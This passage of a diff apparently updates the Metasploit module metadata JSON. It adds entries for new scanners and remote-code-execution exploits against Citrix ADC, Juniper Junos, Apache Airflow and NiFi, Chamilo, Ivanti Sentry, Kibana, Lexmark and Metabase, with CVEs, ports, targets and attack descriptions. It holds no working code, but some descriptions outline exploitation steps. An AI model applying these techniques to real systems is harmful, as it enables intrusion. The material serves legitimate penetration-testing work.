+    "needs_cleanup": false
+  },
  "auxiliary_scanner/http/wp_wps_hide_login_revealer": {
    "name": "WordPress WPS Hide Login Login Page Revealer",
    "fullname": "auxiliary/scanner/http/wp_wps_hide_login_revealer",
@@ -40235,6 +40752,53 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_scanner/ldap/ldap_login": {
+    "name": "LDAP Login Scanner",
+    "fullname": "auxiliary/scanner/ldap/ldap_login",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Dean Welch"
+    ],
+    "description": "This module attempts to login to the LDAP service.",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 389,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2023-10-02 13:23:15 +0000",
+    "path": "/modules/auxiliary/scanner/ldap/ldap_login.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/ldap/ldap_login",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_scanner/llmnr/query": {
    "name": "LLMNR Query",
    "fullname": "auxiliary/scanner/llmnr/query",
@@ -41720,6 +42284,60 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_scanner/msmq/cve_2023_21554_queuejumper": {
+    "name": "CVE-2023-21554 - QueueJumper - MSMQ RCE Check",
+    "fullname": "auxiliary/scanner/msmq/cve_2023_21554_queuejumper",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2023-04-11",
+    "type": "auxiliary",
+    "author": [
+      "Wayne Low",
+      "Haifei Li",
+      "Bastian Kanbach <bastian.kanbach@securesystems.de>"
+    ],
+    "description": "This module checks the provided hosts for the CVE-2023-21554 vulnerability by sending\n          a MSMQ message with an altered DataLength field within the SRMPEnvelopeHeader that\n          overflows the given buffer. On patched systems, the error is caught and no response\n          is sent back. On vulnerable systems, the integer wraps around and depending on the length\n          could cause an out-of-bounds write. In the context of this module a response is sent back,\n          which indicates that the system is vulnerable.",
+    "references": [
+      "CVE-2023-21554",
+      "URL-https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-21554",
+      "URL-https://securityintelligence.com/posts/msmq-queuejumper-rce-vulnerability-technical-analysis/"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 1801,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2023-09-05 13:15:36 +0000",
+    "path": "/modules/auxiliary/scanner/msmq/cve_2023_21554_queuejumper.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/msmq/cve_2023_21554_queuejumper",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "AKA": [
+        "QueueJumper"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_scanner/mssql/mssql_hashdump": {
    "name": "MSSQL Password Hashdump",
    "fullname": "auxiliary/scanner/mssql/mssql_hashdump",
@@ -41917,7 +42535,7 @@
      "theLightCosine <theLightCosine@metasploit.com>",
      "jcran <jcran@metasploit.com>"
    ],
-    "description": "This module exploits a password bypass vulnerability in MySQL in order\n        to extract the usernames and encrypted password hashes from a MySQL server.\n        These hashes are stored as loot for later cracking.",
+    "description": "This module exploits a password bypass vulnerability in MySQL in order\n        to extract the usernames and encrypted password hashes from a MySQL server.\n        These hashes are stored as loot for later cracking.\n\n        Impacts MySQL versions:\n        - 5.1.x before 5.1.63\n        - 5.5.x before 5.5.24\n        - 5.6.x before 5.6.6\n\n        And MariaDB versions:\n        - 5.1.x before 5.1.62\n        - 5.2.x before 5.2.12\n        - 5.3.x before 5.3.6\n        - 5.5.x before 5.5.23",
    "references": [
      "CVE-2012-2122",
      "OSVDB-82804",
@@ -41933,7 +42551,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2023-08-17 19:07:28 +0000",
    "path": "/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb",
    "is_install_path": true,
    "ref_name": "scanner/mysql/mysql_authbypass_hashdump",
@@ -41972,7 +42590,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-08-17 19:07:28 +0000",
    "path": "/modules/auxiliary/scanner/mysql/mysql_file_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/mysql/mysql_file_enum",
@@ -42162,7 +42780,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-08-17 19:07:28 +0000",
    "path": "/modules/auxiliary/scanner/mysql/mysql_writable_dirs.rb",
    "is_install_path": true,
    "ref_name": "scanner/mysql/mysql_writable_dirs",
@@ -48086,7 +48704,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2023-01-24 14:30:39 +0000",
+    "mod_time": "2023-09-20 13:52:06 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_login",
@@ -48405,7 +49023,7 @@
      "smtps"
    ],
    "targets": null,
-    "mod_time": "2023-01-04 14:45:58 +0000",
+    "mod_time": "2023-09-18 19:33:07 +0000",
    "path": "/modules/auxiliary/scanner/smtp/smtp_relay.rb",
    "is_install_path": true,
    "ref_name": "scanner/smtp/smtp_relay",
@@ -49436,7 +50054,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-04-14 17:27:19 +0000",
+    "mod_time": "2023-07-25 13:44:47 +0000",
    "path": "/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/libssh_auth_bypass",
@@ -49911,7 +50529,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-11-05 07:23:14 +0000",
+    "mod_time": "2023-08-28 16:49:31 +0000",
    "path": "/modules/auxiliary/scanner/ssl/ssl_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssl/ssl_version",
@@ -51655,7 +52273,7 @@
      "winrm"
    ],
    "targets": null,
-    "mod_time": "2023-01-24 14:30:39 +0000",
+    "mod_time": "2023-06-14 00:40:33 +0000",
    "path": "/modules/auxiliary/scanner/winrm/winrm_cmd.rb",
    "is_install_path": true,
    "ref_name": "scanner/winrm/winrm_cmd",
@@ -51706,7 +52324,7 @@
      "winrm"
    ],
    "targets": null,
-    "mod_time": "2023-01-24 14:30:39 +0000",
+    "mod_time": "2023-06-14 00:40:33 +0000",
    "path": "/modules/auxiliary/scanner/winrm/winrm_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/winrm/winrm_login",
@@ -58726,6 +59344,138 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_freebsd/http/citrix_formssso_target_rce": {
+    "name": "Citrix ADC (NetScaler) Forms SSO Target RCE",
+    "fullname": "exploit/freebsd/http/citrix_formssso_target_rce",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2023-07-18",
+    "type": "exploit",
+    "author": [
+      "Ron Bowes",
+      "Douglass McKee",
+      "Spencer McIntyre",
+      "rwincey"
+    ],
+    "description": "A vulnerability exists within Citrix ADC that allows an unauthenticated attacker to trigger a stack buffer\n          overflow of the nsppe process by making a specially crafted HTTP GET request. Successful exploitation results in\n          remote code execution as root.",
+    "references": [
+      "CVE-2023-3519",
+      "URL-https://attackerkb.com/topics/si09VNJhHh/cve-2023-3519",
+      "URL-https://support.citrix.com/article/CTX561482/citrix-adc-and-citrix-gateway-security-bulletin-for-cve20233519-cve20233466-cve20233467"
+    ],
+    "platform": "Unix",
+    "arch": "cmd",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic Targeting",
+      "Citrix ADC 13.1-48.47",
+      "Citrix ADC 13.1-37.38",
+      "Citrix ADC 13.0-91.12",
+      "Citrix ADC 12.1-65.25",
+      "Citrix ADC 12.1-64.17"
+    ],
+    "mod_time": "2023-08-07 12:50:23 +0000",
+    "path": "/modules/exploits/freebsd/http/citrix_formssso_target_rce.rb",
+    "is_install_path": true,
+    "ref_name": "freebsd/http/citrix_formssso_target_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
+  "exploit_freebsd/http/junos_phprc_auto_prepend_file": {
+    "name": "Junos OS PHPRC Environment Variable Manipulation RCE",
+    "fullname": "exploit/freebsd/http/junos_phprc_auto_prepend_file",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-08-17",
+    "type": "exploit",
+    "author": [
+      "Jacob Baines",
+      "Ron Bowes",
+      "jheysel-r7"
+    ],
+    "description": "This module exploits a PHP environment variable manipulation vulnerability affecting Juniper SRX firewalls\n          and EX switches. The affected Juniper devices run FreeBSD and every FreeBSD process can access their stdin\n          by opening /dev/fd/0. The exploit also makes use of two useful PHP features. The first being\n          'auto_prepend_file' which causes the provided file to be added using the 'require' function. The second PHP\n          function is 'allow_url_include' which allows the use of URL-aware fopen wrappers. By enabling\n          allow_url_include, the exploit can use any protocol wrapper with auto_prepend_file. The module then uses\n          data:// to provide a file inline which includes the base64 encoded PHP payload.\n\n          By default this exploit returns a session confined to a FreeBSD jail with limited functionality. There is a\n          datastore option 'JAIL_BREAK', that when set to true, will steal the necessary tokens from a user authenticated\n          to the J-Web application, in order to overwrite the the root password hash. If there is no user\n          authenticated to the J-Web application this method will not work. The module then authenticates\n          with the new root password over SSH and then rewrites the original root password hash to /etc/master.passwd.",
+    "references": [
+      "URL-https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/",
+      "URL-https://vulncheck.com/blog/juniper-cve-2023-36845",
+      "URL-https://supportportal.juniper.net/s/article/2023-08-Out-of-Cycle-Security-Bulletin-Junos-OS-SRX-Series-and-EX-Series-Multiple-vulnerabilities-in-J-Web-can-be-combined-to-allow-a-preAuth-Remote-Code-Execution?language=en_US",
+      "CVE-2023-36845"
+    ],
+    "platform": "PHP,Unix",
+    "arch": "php, cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "PHP In-Memory",
+      "Interactive SSH with jail break"
+    ],
+    "mod_time": "2023-09-29 11:40:03 +0000",
+    "path": "/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb",
+    "is_install_path": true,
+    "ref_name": "freebsd/http/junos_phprc_auto_prepend_file",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "config-changes"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_freebsd/http/watchguard_cmd_exec": {
    "name": "Watchguard XCS Remote Command Execution",
    "fullname": "exploit/freebsd/http/watchguard_cmd_exec",
@@ -59982,6 +60732,72 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/apache_airflow_dag_rce": {
+    "name": "Apache Airflow 1.10.10 - Example DAG Remote Code Execution",
+    "fullname": "exploit/linux/http/apache_airflow_dag_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-07-14",
+    "type": "exploit",
+    "author": [
+      "xuxiang",
+      "Pepe Berba",
+      "Ismail E. Dawoodjee"
+    ],
+    "description": "This module exploits an unauthenticated command injection vulnerability\n          by combining two critical vulnerabilities in Apache Airflow 1.10.10.\n          The first, CVE-2020-11978, is an authenticated command injection vulnerability\n          found in one of Airflow's example DAGs, \"example_trigger_target_dag\", which\n          allows any authenticated user to run arbitrary OS commands as the user\n          running Airflow Worker/Scheduler. The second, CVE-2020-13927, is a default\n          setting of Airflow 1.10.10 that allows unauthenticated access to Airflow's\n          Experimental REST API to perform malicious actions such as creating the\n          vulnerable DAG above. The two CVEs taken together allow vulnerable DAG creation\n          and command injection, leading to unauthenticated remote code execution.",
+    "references": [
+      "EDB-49927",
+      "CVE-2020-11978",
+      "CVE-2020-13927",
+      "URL-https://github.com/pberba/CVE-2020-11978/",
+      "URL-https://lists.apache.org/thread/cn57zwylxsnzjyjztwqxpmly0x9q5ljx",
+      "URL-https://lists.apache.org/thread/mq1bpqf3ztg1nhyc5qbrjobfrzttwx1d"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 8080,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command"
+    ],
+    "mod_time": "2023-09-17 22:42:07 +0000",
+    "path": "/modules/exploits/linux/http/apache_airflow_dag_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/apache_airflow_dag_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/apache_continuum_cmd_exec": {
    "name": "Apache Continuum Arbitrary Command Execution",
    "fullname": "exploit/linux/http/apache_continuum_cmd_exec",
@@ -60152,6 +60968,70 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/apache_nifi_h2_rce": {
+    "name": "Apache NiFi H2 Connection String Remote Code Execution",
+    "fullname": "exploit/linux/http/apache_nifi_h2_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-06-12",
+    "type": "exploit",
+    "author": [
+      "h00die",
+      "Matei \"Mal\" Badanoiu"
+    ],
+    "description": "The DBCPConnectionPool and HikariCPConnectionPool Controller Services in\n          Apache NiFi 0.0.2 through 1.21.0 allow an authenticated and authorized user\n          to configure a Database URL with the H2 driver that enables custom code execution.\n\n          This exploit will result in several shells (5-7).\n          Successfully tested against Apache nifi 1.17.0 through 1.21.0.",
+    "references": [
+      "CVE-2023-34468",
+      "URL-https://lists.apache.org/thread/7b82l4f5blmpkfcynf3y6z4x1vqo59h8",
+      "URL-https://issues.apache.org/jira/browse/NIFI-11653",
+      "URL-https://nifi.apache.org/security.html#1.22.0"
+    ],
+    "platform": "Unix",
+    "arch": "cmd",
+    "rport": 8443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix (In-Memory)"
+    ],
+    "mod_time": "2023-08-28 17:39:02 +0000",
+    "path": "/modules/exploits/linux/http/apache_nifi_h2_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/apache_nifi_h2_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "config-changes",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/apache_ofbiz_deserialization": {
    "name": "Apache OFBiz XML-RPC Java Deserialization",
    "fullname": "exploit/linux/http/apache_ofbiz_deserialization",
@@ -61211,6 +62091,70 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_linux/http/chamilo_unauth_rce_cve_2023_34960": {
+    "name": "Chamilo unauthenticated command injection in PowerPoint upload",
+    "fullname": "exploit/linux/http/chamilo_unauth_rce_cve_2023_34960",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-06-01",
+    "type": "exploit",
+    "author": [
+      "h00die-gr3y <h00die.gr3y@gmail.com>",
+      "Randorisec"
+    ],
+    "description": "Chamilo is an e-learning platform, also called Learning Management Systems (LMS).\n          This module exploits an unauthenticated remote command execution vulnerability\n          that affects Chamilo versions `1.11.18` and below (CVE-2023-34960).\n          Due to a functionality called Chamilo Rapid to easily convert PowerPoint\n          slides to courses on Chamilo, it is possible for an unauthenticated remote\n          attacker to execute arbitrary commands at OS level using a malicious SOAP\n          request at the vulnerable endpoint `/main/webservices/additional_webservices.php`.",
+    "references": [
+      "CVE-2023-34960",
+      "URL-https://www.randorisec.fr/pt/chamilo-1.11.18-multiple-vulnerabilities",
+      "URL-https://attackerkb.com/topics/VVJpMeSpUP/cve-2023-34960"
+    ],
+    "platform": "Linux,PHP,Unix",
+    "arch": "php, cmd, x64, x86, aarch64",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "PHP",
+      "Unix Command",
+      "Linux Dropper"
+    ],
+    "mod_time": "2023-08-23 11:38:07 +0000",
+    "path": "/modules/exploits/linux/http/chamilo_unauth_rce_cve_2023_34960.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/chamilo_unauth_rce_cve_2023_34960",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_linux/http/cisco_asax_sfr_rce": {
    "name": "Cisco ASA-X with FirePOWER Services Authenticated Command Injection",
    "fullname": "exploit/linux/http/cisco_asax_sfr_rce",
@@ -65229,6 +66173,74 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/h2_webinterface_rce": {
+    "name": "H2 Web Interface Create Alias RCE",
+    "fullname": "exploit/linux/http/h2_webinterface_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2018-04-09",
+    "type": "exploit",
+    "author": [
+      "h00die",
+      "gambler",
+      "h4ckNinja",
+      "Nairuz Abulhul"
+    ],
+    "description": "The H2 database contains an alias function which allows for arbitrary Java code to be used.\n          This functionality can be abused to create an exec functionality to pull our payload down\n          and execute it. H2's web interface contains restricts MANY characters, so injecting a payload\n          directly is not favorable. A valid database connection is required. If the database engine\n          was configured to allow creation of databases, the module default can be used which\n          utilizes an in memory database. Some Docker instances of H2 don't allow writing to\n          folders such as /tmp, so we default to writing to the working directory of the software.\n\n          This module was tested against H2 version 2.1.214, 2.0.204, 1.4.199 (version detection fails)",
+    "references": [
+      "EDB-44422",
+      "EDB-45506",
+      "URL-https://medium.com/r3d-buck3t/chaining-h2-database-vulnerabilities-for-rce-9b535a9621a2",
+      "URL-https://www.h2database.com/html/commands.html#create_alias"
+    ],
+    "platform": "Unix",
+    "arch": "cmd",
+    "rport": 8082,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic Target"
+    ],
+    "mod_time": "2023-08-08 15:28:34 +0000",
+    "path": "/modules/exploits/linux/http/h2_webinterface_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/h2_webinterface_rce",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "NOCVE": [
+        "abusing a feature"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/hadoop_unauth_exec": {
    "name": "Hadoop YARN ResourceManager Unauthenticated Command Execution",
    "fullname": "exploit/linux/http/hadoop_unauth_exec",
@@ -65959,6 +66971,70 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/ivanti_sentry_misc_log_service": {
+    "name": "Ivanti Sentry MICSLogService Auth Bypass resulting in RCE (CVE-2023-38035)",
+    "fullname": "exploit/linux/http/ivanti_sentry_misc_log_service",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-08-21",
+    "type": "exploit",
+    "author": [
+      "Zach Hanley",
+      "James Horseman",
+      "jheysel-r7"
+    ],
+    "description": "This module exploits an authentication bypass in Ivanti Sentry which exposes API functionality which\n          allows for code execution in the context of the root user.",
+    "references": [
+      "URL-https://github.com/horizon3ai/CVE-2023-38035",
+      "URL-https://www.horizon3.ai/ivanti-sentry-authentication-bypass-cve-2023-38035-deep-dive/",
+      "CVE-2023-38035"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x64",
+    "rport": 8443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix (In-Memory)",
+      "Linux Dropper"
+    ],
+    "mod_time": "2023-09-12 15:14:10 +0000",
+    "path": "/modules/exploits/linux/http/ivanti_sentry_misc_log_service.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/ivanti_sentry_misc_log_service",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/jenkins_cli_deserialization": {
    "name": "Jenkins CLI Deserialization",
    "fullname": "exploit/linux/http/jenkins_cli_deserialization",
@@ -66121,6 +67197,128 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/kibana_timelion_prototype_pollution_rce": {
+    "name": "Kibana Timelion Prototype Pollution RCE",
+    "fullname": "exploit/linux/http/kibana_timelion_prototype_pollution_rce",
+    "aliases": [
+
+    ],
+    "rank": 0,
+    "disclosure_date": "2019-10-30",
+    "type": "exploit",
+    "author": [
+      "h00die",
+      "Michał Bentkowski",
+      "Gaetan Ferry"
+    ],
+    "description": "Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer.\n          An attacker with access to the Timelion application could send a request that will attempt to execute\n          javascript code. This leads to an arbitrary command execution with permissions of the\n          Kibana process on the host system.\n\n          Exploitation will require a service or system reboot to restore normal operation.\n\n          The WFSDELAY parameter is crucial for this exploit. Setting it too high will cause MANY shells\n          (50-100+), while setting it too low will cause no shells to be obtained. WFSDELAY of 10 for a\n          docker image caused 6 shells.\n\n          Tested against kibana 6.5.4.",
+    "references": [
+      "URL-https://github.com/mpgn/CVE-2019-7609",
+      "URL-https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/",
+      "CVE-2019-7609"
+    ],
+    "platform": "Unix",
+    "arch": "cmd",
+    "rport": 5601,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic Target"
+    ],
+    "mod_time": "2023-09-01 20:34:35 +0000",
+    "path": "/modules/exploits/linux/http/kibana_timelion_prototype_pollution_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/kibana_timelion_prototype_pollution_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-service-down"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
+  "exploit_linux/http/kibana_upgrade_assistant_telemetry_rce": {
+    "name": "Kibana Upgrade Assistant Telemetry Collector Prototype Pollution",
+    "fullname": "exploit/linux/http/kibana_upgrade_assistant_telemetry_rce",
+    "aliases": [
+
+    ],
+    "rank": 0,
+    "disclosure_date": "2020-04-17",
+    "type": "exploit",
+    "author": [
+      "h00die",
+      "Alex Brasetvik (alexbrasetvik)"
+    ],
+    "description": "Kibana before version 7.6.3 suffers from a prototype pollution bug within the\n          Upgrade Assistant. By setting a new constructor.prototype.sourceURL value we're\n          able to execute arbitrary code.\n          Code execution is possible through two different ways. Either by sending data\n          directly to Elastic, or using Kibana to submit the same queries. Either method\n          enters the polluted prototype for Kibana to read.\n\n          Kibana will either need to be restarted, or collection happens (unknown time) for\n          the payload to execute. Once it does, cleanup must delete the .kibana_1 index\n          for Kibana to restart successfully. Once a callback does occur, cleanup will\n          happen allowing Kibana to be successfully restarted on next attempt.",
+    "references": [
+      "URL-https://hackerone.com/reports/852613"
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": 9200,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "ELASTIC",
+      "KIBANA"
+    ],
+    "mod_time": "2023-10-06 09:55:10 +0000",
+    "path": "/modules/exploits/linux/http/kibana_upgrade_assistant_telemetry_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/kibana_upgrade_assistant_telemetry_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-service-down"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/klog_server_authenticate_user_unauth_command_injection": {
    "name": "Klog Server authenticate.php user Unauthenticated Command Injection",
    "fullname": "exploit/linux/http/klog_server_authenticate_user_unauth_command_injection",
@@ -66243,6 +67441,69 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_linux/http/lexmark_faxtrace_settings": {
+    "name": "Lexmark Device Embedded Web Server RCE",
+    "fullname": "exploit/linux/http/lexmark_faxtrace_settings",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-03-13",
+    "type": "exploit",
+    "author": [
+      "James Horseman",
+      "Zach Hanley",
+      "jheysel-r7"
+    ],
+    "description": "A unauthenticated Remote Code Execution vulnerability exists in the embedded webserver in certain Lexmark devices through 2023-02-19.\n          The vulnerability is only exposed if, when setting up the printer or device, the user selects \"Set up Later\" when asked\n          if they would like to add an Admin user. If no Admin user is created the endpoint `/cgi-bin/fax_change_faxtrace_settings`\n          is accessible without authentication. The endpoint allows the user to configure a number of different fax settings.\n\n          A number of the configurable parameters on the page (ex. `FT_Custom_lbtrace`) fail to be sanitized properly before being\n          used in an bash eval statement: `eval \"$cmd\" > /dev/null`, allowing for an unauthenticated user to run arbitrary commands.",
+    "references": [
+      "URL-https://github.com/horizon3ai/CVE-2023-26067",
+      "URL-https://publications.lexmark.com/publications/security-alerts/CVE-2023-26068.pdf",
+      "URL-https://www.horizon3.ai/lexmark-command-injection-vulnerability-zdi-can-19470-pwn2own-toronto-2022/",
+      "CVE-2023-26068"
+    ],
+    "platform": "Unix",
+    "arch": "cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix (In-Memory)"
+    ],
+    "mod_time": "2023-09-06 15:47:54 +0000",
+    "path": "/modules/exploits/linux/http/lexmark_faxtrace_settings.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/lexmark_faxtrace_settings",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/librenms_addhost_cmd_inject": {
    "name": "LibreNMS addhost Command Injection",
    "fullname": "exploit/linux/http/librenms_addhost_cmd_inject",
@@ -67077,6 +68338,68 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/metabase_setup_token_rce": {
+    "name": "Metabase Setup Token RCE",
+    "fullname": "exploit/linux/http/metabase_setup_token_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-07-22",
+    "type": "exploit",
+    "author": [
+      "h00die",
+      "Maxwell Garrett",
+      "Shubham Shah"
+    ],
+    "description": "Metabase versions before 0.46.6.1 contain a flaw where the secret setup-token\n          is accessible even after the setup process has been completed. With this token\n          a user is able to submit the setup functionality to create a new database.\n          When creating a new database, an H2 database string is created with a TRIGGER\n          that allows for code execution. We use a sample database for our connection\n          string to prevent corrupting real databases.\n\n          Successfully tested against Metabase 0.46.6.",
